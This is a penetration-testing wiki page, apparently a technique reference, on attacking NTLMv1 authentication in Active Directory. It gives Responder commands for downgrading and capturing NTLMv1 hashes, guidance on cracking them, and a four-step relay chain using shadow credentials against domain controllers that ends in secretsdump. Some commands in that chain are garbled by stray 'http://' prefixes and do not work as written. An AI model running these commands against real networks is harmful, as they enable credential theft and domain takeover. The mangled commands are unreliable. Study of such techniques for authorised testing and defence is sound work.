# NTLMv1

NT LAN Manager version 1 (NTLMv1) is vulnerable to several attacks and should be disabled in environments whenever possible. All Microsoft operating systems support its successor NT Lan Manager version 2 (NTLMv2) which should be used instead.

A NTLMv1 hash is formatted like the following:

```bash
username::hostname:response:response:challenge -> NTHASH:response
```

### Downgrading

It is possible in environments where NT LAN Manager version 1 is utilized to obtain an NTLMv1 hash from a target computer.

While this was partially described in the [Coercion section](https://ttp.parzival.sh/pentesting/infrastructure/active-directory/coercing-authentication), prior to receiving a callback we need to run Responder, after modifying the 'Challenge' variable to `1122334455667788.` We can then run Responder with the following options:

```bash
# Receive and attempt to crack the hash with crack.sh's rainbow tables
Responder.py -I $interface --lm 

# Attempt to remove ESS/SSP and crack locally or for a fee
Responder.py -I $interface --lm --disable-ess
```

### Cracking NTLMv1

Referencing crack.sh, a NTLMv1 hash with ESS/SSP looks like the following:

```
hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788
```

After obtaining a hash with ESS/SSP, we first need to reformat the obtained hash using EvilMog's [NTLMv1-multi tool](https://github.com/evilmog/ntlmv1-multi) or [assless-chaps](https://github.com/sensepost/assless-chaps) and cracked with a database of NT hashes. 

{% hint style="warning" %}
If we weren't able to remove the ESS/SSP with Responder then it will no longer be possible to crack with crack.sh’s rainbow tables. Instead, it can be submitted and crack on crack.sh for a fee.
{% endhint %}

### Attacking a Domain Controller

If NTLMv1 is enabled, you can leverage the ability where DC's have the ability to modify their own msDS-KeyCredentialLink attribute. It should be noted this requires two domain controllers to exploit.

```bash
1. ntlmrelayx.py -t ldap://$dc1 -of hashes --shadow-credentials --shadow-target '$dc2' --cert-outfile-path crt --no-validate-privs --remove-mic
2. gettgtpkinit.py -cert-pfx crt.pfx -pfx-pass PFX_PASSWORD http://contoso.com/DC2$ crt.ccache
3. KRB5CCNAME=crt.ccache http://getnthash.py http://contoso.com/DC2\$ -key KEY_FROM_PKINIT
4. secretsdump.py 'http://contoso.com/DC2$'@DC2 -hashes :LMHASH_FROM_GETNTHASH -history
```

### References 

{% embed url="<https://crack.sh/cracking-ntlmv1-w-ess-ssp/>" %}

{% embed url="<https://www.praetorian.com/blog/ntlmv1-vs-ntlmv2/>" %}

{% embed url="<https://www.trustedsec.com/blog/practical-attacks-against-ntlmv1/>" %}

{% embed url="<https://twitter.com/godacity_/status/1646282884020580352>" %}